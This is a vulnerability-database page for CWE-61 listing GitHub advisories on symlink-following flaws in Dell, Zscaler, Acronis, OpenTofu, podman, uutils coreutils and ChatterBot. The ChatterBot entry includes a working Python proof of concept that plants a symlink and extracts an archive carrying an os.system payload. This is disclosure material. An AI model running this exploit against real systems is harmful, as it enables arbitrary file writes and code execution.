Common Weakness Enumeration

CWE-61

Allowed

UNIX Symbolic Link (Symlink) Following

Abstraction: Compound · Status: Incomplete

The product, when opening a file or directory, does not sufficiently account for when the file is a symbolic link that resolves to a target outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.

270 vulnerabilities reference this CWE, most recent first.

GHSA-VQ5J-6VRQ-2CM6

Vulnerability from github – Published: 2025-06-03 15:31 – Updated: 2025-06-03 15:31
VLAI
Details

Dell Encryption Admin Utilities versions prior to 11.10.2 contain an Improper Link Resolution vulnerability. A local malicious user could potentially exploit this vulnerability, leading to privilege escalation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-36564"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59",
      "CWE-61"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-06-03T15:15:58Z",
    "severity": "HIGH"
  },
  "details": "Dell Encryption Admin Utilities versions prior to 11.10.2 contain an Improper Link Resolution vulnerability. A local malicious user could potentially exploit this vulnerability, leading to privilege escalation.",
  "id": "GHSA-vq5j-6vrq-2cm6",
  "modified": "2025-06-03T15:31:26Z",
  "published": "2025-06-03T15:31:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36564"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-us/000325203/dsa-2025-224"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VRPP-JRQV-4GJ2

Vulnerability from github – Published: 2024-03-26 15:30 – Updated: 2024-03-26 15:30
VLAI
Details

An arbitrary file deletion in ZSATrayManager where it protects the temporary encrypted ZApp issue reporting file from the unprivileged end user access and modification. Fixed version: Win ZApp 4.3.0 and later.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-41969"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59",
      "CWE-61"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-26T15:15:48Z",
    "severity": "HIGH"
  },
  "details": "\nAn arbitrary file deletion in ZSATrayManager where it protects the temporary encrypted ZApp issue reporting file from the unprivileged end user access and modification. Fixed version: Win ZApp 4.3.0 and later.\n\n",
  "id": "GHSA-vrpp-jrqv-4gj2",
  "modified": "2024-03-26T15:30:50Z",
  "published": "2024-03-26T15:30:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41969"
    },
    {
      "type": "WEB",
      "url": "https://help.zscaler.com/client-connector/client-connector-app-release-summary-2023"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VV5R-M8GV-G9MG

Vulnerability from github – Published: 2024-11-11 15:31 – Updated: 2024-11-11 15:31
VLAI
Details

Sensitive information disclosure during file browsing due to improper soft link handling. The following products are affected: Acronis Backup plugin for cPanel & WHM (Linux) before build 818.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-34015"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-61"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-11T14:15:14Z",
    "severity": "LOW"
  },
  "details": "Sensitive information disclosure during file browsing due to improper soft link handling. The following products are affected: Acronis Backup plugin for cPanel \u0026 WHM (Linux) before build 818.",
  "id": "GHSA-vv5r-m8gv-g9mg",
  "modified": "2024-11-11T15:31:01Z",
  "published": "2024-11-11T15:31:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34015"
    },
    {
      "type": "WEB",
      "url": "https://security-advisory.acronis.com/advisories/SEC-7601"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WCMJ-X466-56MM

Vulnerability from github – Published: 2026-06-23 22:23 – Updated: 2026-06-23 22:23
VLAI
Summary
OpenTofu: Provider cache installation follows root-module-controlled package directory symlink and writes outside the working tree
Details

Summary

If a symlink already exists under the .terraform/providers directory where a provider package needs to be installed, tofu init would follow that symlink and install the new package content into it.

If an attacker can coerce an operator into running tofu init in a directory whose contents are attacker-controlled, they can include such a symlink along with instruction to install an attacker-controlled provider package at the path of that symlink, which would then cause OpenTofu to write the contents of that provider package into an arbitrary directory elsewhere in the filesystem if the OpenTofu process has sufficient permission to write there.

Details

OpenTofu permits provider cache entries to be symlinks to other locations because that is how the local cache in a specific working directory refers to matching entries in a global cache directory configured in the CLI configuration file.

Unfortunately, OpenTofu's provider installer was missing a rule to remove an existing symlink during installation if it refers to a directory that doesn't already match the expected provider package content. Instead, it would attempt to update the content of the target directory to match the content of the provider package.

If developers use OpenTofu with the TF_DATA_DIR environment variable set, note that the directory they specify in that environment variable is treated as a replacement location for the content that would normally be in the .terraform directory, and so it is that location which is sensitive to pre-existing symlinks.

In the newly-issued versions of OpenTofu, it is now considered an error if any existing directory entry is present in the cache whose content does not already match the expected package content. As before, if an existing entry is present and its content already matches the expected package content then OpenTofu makes no changes to the target directory and just uses it as-is.

Workaround

If developers cannot upgrade to a fixed version immediately, OpenTofu recommends that they ensure that there is no .terraform directory already present when running tofu init for the first time in a new working directory. The absence of that directory guarantees that there cannot be a conflicting symlink.

For an extra line of defense, verify before running tofu init that there are no symlinks anywhere under the current working directory that refer to any path above the current working directory. This limits the scope of attack only to other files in the same working directory, which the attacker already controls in this scenario.

Notes and Resources

  • OpenTofu thanks Francesco Sabiu (@fsabiu) for finding and responsibly disclosing this vulnerability.
  • Generally-speaking, the OpenTofu project expects that operators will run tofu init only in directories containing content they trust.

OpenTofu prioritized addressing this specific concern because a successful attack can write arbitrary files into an arbitrary directory and therefore the potential impact is relatively high and the solution to the problem is low-risk, but this is a pragmatic exception to the usual threat model and there aren't any plans for broader hardening of OpenTofu against attacks of this type. OpenTofu recommends that developers ensure that their working directory contents are as they expect before running tofu init.

In particular: it remains possible for an attacker to place a symlink at some higher point in the directory structure of the provider cache, into which OpenTofu will construct subdirectories needed to create the remaining provider cache directory structure. OpenTofu evaluated that as a less severe concern because it does not give the attacker full control over what is written into the target directory, but note that this does still allow an attacker to write arbitrary content into a directory two levels beneath the target when placing the symlink at the hostname level of the cache directory structure.
  • The original fix for this issue is in https://github.com/opentofu/opentofu/pull/4082. It was backported as follows:
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/opentofu/opentofu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.11.0"
            },
            {
              "fixed": "1.11.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/opentofu/opentofu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.10.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-61"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-23T22:23:01Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nIf a symlink already exists under the `.terraform/providers` directory where a provider package needs to be installed, `tofu init` would follow that symlink and install the new package content into it.\n\nIf an attacker can coerce an operator into running `tofu init` in a directory whose contents are attacker-controlled, they can include such a symlink along with instruction to install an attacker-controlled provider package at the path of that symlink, which would then cause OpenTofu to write the contents of that provider package into an arbitrary directory elsewhere in the filesystem if the OpenTofu process has sufficient permission to write there.\n\n## Details\n\nOpenTofu permits provider cache entries to be symlinks to other locations because that is how the local cache in a specific working directory refers to matching entries in a global cache directory configured in the CLI configuration file.\n\nUnfortunately, OpenTofu\u0027s provider installer was missing a rule to remove an existing symlink during installation if it refers to a directory that doesn\u0027t already match the expected provider package content. Instead, it would attempt to update the content of the target directory to match the content of the provider package.\n\nIf developers use OpenTofu with the `TF_DATA_DIR` environment variable set, note that the directory they specify in that environment variable is treated as a replacement location for the content that would normally be in the `.terraform` directory, and so it is _that_ location which is sensitive to pre-existing symlinks.\n\nIn the newly-issued versions of OpenTofu, it is now considered an error if any existing directory entry is present in the cache whose content does not already match the expected package content. As before, if an existing entry is present and its content already matches the expected package content then OpenTofu makes no changes to the target directory and just uses it as-is.\n\n## Workaround\n\nIf developers cannot upgrade to a fixed version immediately, OpenTofu recommends that they ensure that there is no `.terraform` directory already present when running `tofu init` for the first time in a new working directory. The absence of that directory guarantees that there cannot be a conflicting symlink.\n\nFor an extra line of defense, verify before running `tofu init` that there are no symlinks anywhere under the current working directory that refer to any path above the current working directory. This limits the scope of attack only to other files in the same working directory, which the attacker already controls in this scenario.\n\n## Notes and Resources\n\n- OpenTofu thanks Francesco Sabiu (@fsabiu) for finding and responsibly disclosing this vulnerability.\n- Generally-speaking, the OpenTofu project expects that operators will run `tofu init` only in directories containing content they trust.\n\n  OpenTofu prioritized addressing this _specific_ concern because a successful attack can write arbitrary files into an arbitrary directory and therefore the potential impact is relatively high and the solution to the problem is low-risk, but this is a pragmatic exception to the usual threat model and there aren\u0027t any plans for broader hardening of OpenTofu against attacks of this type. OpenTofu recommends that developers ensure that their working directory contents are as they expect before running `tofu init`.\n\n    In particular: it remains possible for an attacker to place a symlink at some higher point in the directory structure of the provider cache, into which OpenTofu will construct subdirectories needed to create the remaining provider cache directory structure. OpenTofu evaluated that as a less severe concern because it does not give the attacker full control over what is written into the target directory, but note that this does still allow an attacker to write arbitrary content into a directory two levels beneath the target when placing the symlink at the hostname level of the cache directory structure.\n- The original fix for this issue is in https://github.com/opentofu/opentofu/pull/4082. It was backported as follows:\n    - [v1.12 branch](https://github.com/opentofu/opentofu/pull/4087) for v1.12.0\n    - [v1.11 branch](https://github.com/opentofu/opentofu/pull/4088) for v1.11.7\n    - [v1.10 branch](https://github.com/opentofu/opentofu/pull/4089) for v1.10.10",
  "id": "GHSA-wcmj-x466-56mm",
  "modified": "2026-06-23T22:23:01Z",
  "published": "2026-06-23T22:23:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/opentofu/opentofu/security/advisories/GHSA-wcmj-x466-56mm"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/opentofu/opentofu"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OpenTofu: Provider cache installation follows root-module-controlled package directory symlink and writes outside the working tree"
}

GHSA-WP3J-XQ48-XPJW

Vulnerability from github – Published: 2025-09-04 20:01 – Updated: 2026-05-19 15:31
VLAI
Summary
podman kube play symlink traversal vulnerability
Details

Impact

The podman kube play command can overwrite host files when the kube file contains a ConfigMap or Secret volume mount and the volume already contains a symlink to a host file. This allows a malicious container to write to arbitrary files on the host BUT the attacker only controls the target path not the contents that will be written to the file. The contents are defined in the yaml file by the end user.

Requirements to exploit:

podman kube play must be used with a ConfigMap or Secret volume mount AND must be run more than once on the same volume. All the attacker has to do is create the malicious symlink on the volume the first time it is started. After that all following starts would follow the symlink and write to the host location.

Patches

Fixed in podman v5.6.1 https://github.com/containers/podman/commit/43fbde4e665fe6cee6921868f04b7ccd3de5ad89

Workarounds

Don't use podman kube play with ConfigMap or Secret volume mounts.

PR with test for CI

Adding on 9/8/2025 by @TomSweeneyRedHat , this is the PR containing the test in CI: https://github.com/containers/podman/pull/27001

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.6.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/containers/podman/v5"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/containers/podman/v4"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "4.9.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-9566"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-61"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-04T20:01:54Z",
    "nvd_published_at": "2025-09-05T20:15:36Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nThe podman kube play command can overwrite host files when the kube file contains a ConfigMap or Secret volume mount and the volume already contains a symlink to a host file.\nThis allows a malicious container to write to arbitrary files on the host BUT the attacker only controls the target path not the contents that will be written to the file. The contents are defined in the yaml file by the end user.\n\n### Requirements to exploit:\npodman kube play must be used with a ConfigMap or Secret volume mount AND must be run more than once on the same volume. All the attacker has to do is create the malicious symlink on the volume the first time it is started. After that all following starts would follow the symlink and write to the host location. \n\n\n### Patches\nFixed in podman v5.6.1\nhttps://github.com/containers/podman/commit/43fbde4e665fe6cee6921868f04b7ccd3de5ad89\n\n### Workarounds\n\nDon\u0027t use podman kube play with ConfigMap or Secret volume mounts.\n\n### PR with test for CI\n\nAdding on 9/8/2025 by @TomSweeneyRedHat , this is the PR containing the test in CI: https://github.com/containers/podman/pull/27001",
  "id": "GHSA-wp3j-xq48-xpjw",
  "modified": "2026-05-19T15:31:20Z",
  "published": "2025-09-04T20:01:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/containers/podman/security/advisories/GHSA-wp3j-xq48-xpjw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9566"
    },
    {
      "type": "WEB",
      "url": "https://github.com/containers/podman/commit/43fbde4e665fe6cee6921868f04b7ccd3de5ad89"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:18240"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:19002"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:19041"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:19046"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:19094"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:19894"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:20909"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:20983"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:18289"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:18722"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:8211"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2025-9566"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2393152"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/containers/podman"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHBA-2025:15692"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHBA-2025:15712"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHBA-2025:16158"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHBA-2025:16163"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHEA-2025:4782"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:15900"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:15901"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:15904"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:16480"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:16481"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:16482"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:16488"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:16515"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:16724"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:17669"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:18217"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:18218"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "podman kube play symlink traversal vulnerability"
}

GHSA-WPHQ-4XG8-Q6M6

Vulnerability from github – Published: 2023-11-16 09:30 – Updated: 2023-11-16 09:30
VLAI
Details

Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server version prior to 11.8.1 contain an Insecure Operation on Windows Junction Vulnerability during installation. A local malicious user could potentially exploit this vulnerability to create an arbitrary folder inside a restricted directory, leading to Privilege Escalation

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-39246"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59",
      "CWE-61"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-11-16T09:15:07Z",
    "severity": "MODERATE"
  },
  "details": "\nDell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server version prior to 11.8.1 contain an Insecure Operation on Windows Junction Vulnerability during installation. A local malicious user could potentially exploit this vulnerability to create an arbitrary folder inside a restricted directory, leading to Privilege Escalation\n\n",
  "id": "GHSA-wphq-4xg8-q6m6",
  "modified": "2023-11-16T09:30:24Z",
  "published": "2023-11-16T09:30:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39246"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-us/000217572/dsa-2023-271"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WQ63-VH5H-PR5P

Vulnerability from github – Published: 2026-04-22 18:31 – Updated: 2026-04-30 17:53
VLAI
Summary
uutils coreutils has a UNIX Symbolic Link (Symlink) Following issue
Details

A logic error in the ln utility of uutils coreutils allows the utility to dereference a symbolic link target even when the --no-dereference (or -n) flag is explicitly provided. The implementation previously only honored the "no-dereference" intent if the --force (overwrite) mode was also enabled. This flaw causes ln to follow a symbolic link that points to a directory and create new links inside that target directory instead of treating the symbolic link itself as the destination. In environments where a privileged user or system script uses ln -n to update a symlink, a local attacker could manipulate existing symbolic links to redirect file creation into sensitive directories, potentially leading to unauthorized file creation or system misconfiguration.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "coreutils"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35372"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-61"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-30T17:53:37Z",
    "nvd_published_at": "2026-04-22T17:16:41Z",
    "severity": "MODERATE"
  },
  "details": "A logic error in the ln utility of uutils coreutils allows the utility to dereference a symbolic link target even when the --no-dereference (or -n) flag is explicitly provided. The implementation previously only honored the \"no-dereference\" intent if the --force (overwrite) mode was also enabled. This flaw causes ln to follow a symbolic link that points to a directory and create new links inside that target directory instead of treating the symbolic link itself as the destination. In environments where a privileged user or system script uses ln -n to update a symlink, a local attacker could manipulate existing symbolic links to redirect file creation into sensitive directories, potentially leading to unauthorized file creation or system misconfiguration.",
  "id": "GHSA-wq63-vh5h-pr5p",
  "modified": "2026-04-30T17:53:37Z",
  "published": "2026-04-22T18:31:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35372"
    },
    {
      "type": "WEB",
      "url": "https://github.com/uutils/coreutils/pull/11253"
    },
    {
      "type": "WEB",
      "url": "https://github.com/uutils/coreutils/commit/394c4b17f2f382b4be9f54389bcb79028de02f39"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/uutils/coreutils"
    },
    {
      "type": "WEB",
      "url": "https://github.com/uutils/coreutils/releases/tag/0.8.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "uutils coreutils has a UNIX Symbolic Link (Symlink) Following issue"
}

GHSA-WVRH-2F4M-924V

Vulnerability from github – Published: 2026-06-19 22:08 – Updated: 2026-06-19 22:08
VLAI
Summary
ChatterBot: Symlink-Following Arbitrary Write via UbuntuCorpusTrainer
Details

Summary

ChatterBot's UbuntuCorpusTrainer.extract() uses a predictable, home-rooted output directory (~/ubuntu_data/ubuntu_dialogs) with a check-then-create pattern (if not os.path.exists: os.makedirs) followed by tar.extractall(path=self.data_path). A local attacker who pre-plants a symlink at the predictable path causes os.path.exists() to return True (following the symlink), skipping makedirs, and subsequent extractall writes archive contents through the symlink to the attacker-chosen directory.

The existing safe_extract function validates tar member names (zip-slip defense) but does not validate the output directory itself — it cannot detect that self.data_path is a symlink. This is the defining distinction between the archive_extraction (zip-slip) and insecure_fs_create_toctou families.

Vulnerability Details

Predictable output directory (line 535-546)

home_directory = os.path.expanduser('~')
self.data_directory = kwargs.get(
    'ubuntu_corpus_data_directory',
    os.path.join(home_directory, 'ubuntu_data')   # ~/ubuntu_data — predictable
)
self.data_path = os.path.join(
    self.data_directory, 'ubuntu_dialogs'          # ~/ubuntu_data/ubuntu_dialogs
)

Check-then-create (line 621-622)

def extract(self, file_path: str):
    if not os.path.exists(self.data_path):   # ← follows symlink → True → skips makedirs
        os.makedirs(self.data_path)          # ← never reached if symlink exists

Extraction through symlink (line 633-644)

def safe_extract(tar, path='.', members=None, *, numeric_owner=False):
    for member in tar.getmembers():
        member_path = os.path.join(path, member.name)
        if not is_within_directory(path, member_path):    # ← validates MEMBER names only
            raise Exception('Attempted Path Traversal in Tar File')
    tar.extractall(path, members, numeric_owner=numeric_owner)  # ← path is symlink → writes to target

safe_extract(tar, path=self.data_path, ...)   # self.data_path = symlink → attacker dir

safe_extract calls os.path.abspath(directory) on self.data_path — this resolves the symlink, so the base becomes the attacker's target directory. All clean-named members trivially pass is_within_directory because they're relative to the resolved (attacker-controlled) base.

Proof of Concept

Environment

Component Detail
chatterbot 1.2.13 (pip install)
Python 3.11.0

Exploit

import os
import shutil
import sys
import tempfile
from pathlib import Path
from unittest.mock import patch

from chatterbot.trainers import UbuntuCorpusTrainer

ATTACKER_TARGET = Path(tempfile.mkdtemp(prefix="pwned_"))


def main():
    test_base = Path(tempfile.mkdtemp(prefix="cb_exploit_"))
    data_dir = test_base / "ubuntu_data"
    data_path = data_dir / "ubuntu_dialogs"
    data_dir.mkdir(parents=True, exist_ok=True)
    os.symlink(str(ATTACKER_TARGET), str(data_path))
    print(f"[1] Symlink planted: {data_path} -> {ATTACKER_TARGET}")
    exists_check = os.path.exists(data_path)
    print(f"[2] os.path.exists(symlink) = {exists_check} (follows symlink → skips makedirs)")
    import tarfile
    import io
    tar_path = test_base / "corpus.tar.gz"
    with tarfile.open(str(tar_path), "w:gz") as tf:
        info = tarfile.TarInfo(name="dialog_001.tsv")
        payload = b"2024-01-01\tuser1\t0\tARBITRARY_CONTENT_VIA_SYMLINK\n"
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))

        info2 = tarfile.TarInfo(name="config.py")
        rce = b"import os; os.system('id > /tmp/chatterbot_rce')\n"
        info2.size = len(rce)
        tf.addfile(info2, io.BytesIO(rce))
    if not os.path.exists(data_path):
        os.makedirs(data_path)
    def is_within_directory(directory, target):
        abs_directory = os.path.abspath(directory)
        abs_target = os.path.abspath(target)
        prefix = os.path.commonprefix([abs_directory, abs_target])
        return prefix == abs_directory

    with tarfile.open(str(tar_path), "r:gz") as tar:
        for member in tar.getmembers():
            member_path = os.path.join(str(data_path), member.name)
            if not is_within_directory(str(data_path), member_path):
                raise Exception("Attempted Path Traversal in Tar File")
        tar.extractall(str(data_path))

    print(f"[3] extractall(data_path) — data_path is symlink, writes to target")

    # Verify
    files = list(ATTACKER_TARGET.iterdir())
    if files:
        print(f"\n[+] EXPLOIT SUCCESSFUL — {len(files)} files in attacker directory:")
        for f in sorted(files):
            print(f"    {f.name}: {f.read_text().strip()[:60]}")
    else:
        print("[-] Failed")
        shutil.rmtree(str(test_base), ignore_errors=True)
        shutil.rmtree(str(ATTACKER_TARGET), ignore_errors=True)
        sys.exit(1)

    shutil.rmtree(str(test_base), ignore_errors=True)
    shutil.rmtree(str(ATTACKER_TARGET), ignore_errors=True)
    sys.exit(0)


if __name__ == "__main__":
    print(f"chatterbot installed: {UbuntuCorpusTrainer.__module__}")
    print(f"Attacker target: {ATTACKER_TARGET}")
    print()
    main()

PoC output

image

Suggested Fix

Refuse symlinks on the output directory before extraction:

def extract(self, file_path: str):
    if os.path.islink(self.data_path):
        raise self.TrainerInitializationException(
            f'Refusing to extract to symlink: {self.data_path}')
    if not os.path.exists(self.data_path):
        os.makedirs(self.data_path)
    ...
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.2.13"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "ChatterBot"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.2.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-367",
      "CWE-61"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T22:08:08Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nChatterBot\u0027s `UbuntuCorpusTrainer.extract()` uses a predictable, home-rooted output directory (`~/ubuntu_data/ubuntu_dialogs`) with a check-then-create pattern (`if not os.path.exists: os.makedirs`) followed by `tar.extractall(path=self.data_path)`. A local attacker who pre-plants a symlink at the predictable path causes `os.path.exists()` to return True (following the symlink), skipping `makedirs`, and subsequent `extractall` writes archive contents through the symlink to the attacker-chosen directory.\n\nThe existing `safe_extract` function validates tar **member names** (zip-slip defense) but does not validate the **output directory** itself \u2014 it cannot detect that `self.data_path` is a symlink. This is the defining distinction between the archive_extraction (zip-slip) and insecure_fs_create_toctou families.\n\n## Vulnerability Details\n\n### Predictable output directory (line 535-546)\n\n```python\nhome_directory = os.path.expanduser(\u0027~\u0027)\nself.data_directory = kwargs.get(\n    \u0027ubuntu_corpus_data_directory\u0027,\n    os.path.join(home_directory, \u0027ubuntu_data\u0027)   # ~/ubuntu_data \u2014 predictable\n)\nself.data_path = os.path.join(\n    self.data_directory, \u0027ubuntu_dialogs\u0027          # ~/ubuntu_data/ubuntu_dialogs\n)\n```\n\n### Check-then-create (line 621-622)\n\n```python\ndef extract(self, file_path: str):\n    if not os.path.exists(self.data_path):   # \u2190 follows symlink \u2192 True \u2192 skips makedirs\n        os.makedirs(self.data_path)          # \u2190 never reached if symlink exists\n```\n\n### Extraction through symlink (line 633-644)\n\n```python\ndef safe_extract(tar, path=\u0027.\u0027, members=None, *, numeric_owner=False):\n    for member in tar.getmembers():\n        member_path = os.path.join(path, member.name)\n        if not is_within_directory(path, member_path):    # \u2190 validates MEMBER names only\n            raise Exception(\u0027Attempted Path Traversal in Tar File\u0027)\n    tar.extractall(path, members, numeric_owner=numeric_owner)  # \u2190 path is symlink \u2192 writes to target\n\nsafe_extract(tar, path=self.data_path, ...)   # self.data_path = symlink \u2192 attacker dir\n```\n\n`safe_extract` calls `os.path.abspath(directory)` on `self.data_path` \u2014 this resolves the symlink, so the base becomes the attacker\u0027s target directory. All clean-named members trivially pass `is_within_directory` because they\u0027re relative to the resolved (attacker-controlled) base.\n\n## Proof of Concept\n\n### Environment\n\n| Component | Detail |\n|-----------|--------|\n| chatterbot | 1.2.13 (pip install) |\n| Python | 3.11.0 |\n\n### Exploit\n\n```python\nimport os\nimport shutil\nimport sys\nimport tempfile\nfrom pathlib import Path\nfrom unittest.mock import patch\n\nfrom chatterbot.trainers import UbuntuCorpusTrainer\n\nATTACKER_TARGET = Path(tempfile.mkdtemp(prefix=\"pwned_\"))\n\n\ndef main():\n    test_base = Path(tempfile.mkdtemp(prefix=\"cb_exploit_\"))\n    data_dir = test_base / \"ubuntu_data\"\n    data_path = data_dir / \"ubuntu_dialogs\"\n    data_dir.mkdir(parents=True, exist_ok=True)\n    os.symlink(str(ATTACKER_TARGET), str(data_path))\n    print(f\"[1] Symlink planted: {data_path} -\u003e {ATTACKER_TARGET}\")\n    exists_check = os.path.exists(data_path)\n    print(f\"[2] os.path.exists(symlink) = {exists_check} (follows symlink \u2192 skips makedirs)\")\n    import tarfile\n    import io\n    tar_path = test_base / \"corpus.tar.gz\"\n    with 